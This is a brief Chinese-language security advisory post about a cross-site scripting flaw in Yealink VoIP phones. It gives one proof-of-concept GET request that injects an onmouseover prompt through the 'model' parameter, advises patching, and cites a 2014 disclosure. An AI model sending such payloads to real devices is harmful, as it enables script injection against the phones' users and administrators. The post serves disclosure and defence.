分享至
Yealink VoIP Phones 有 XSS 漏洞,造成可以注入任意 XSS 代碼造成危害。
GET /servlet?jumpto=dsskey&model=%22%20onmouseover%3dprompt%28 1337 %29%20badpuppy%3d%22&p=login&q=loginForm HTTP/1.1
打 Patch 更新 。
參考資料:http://seclists.org/fulldisclosure/2014/Jun/74
IT邦幫忙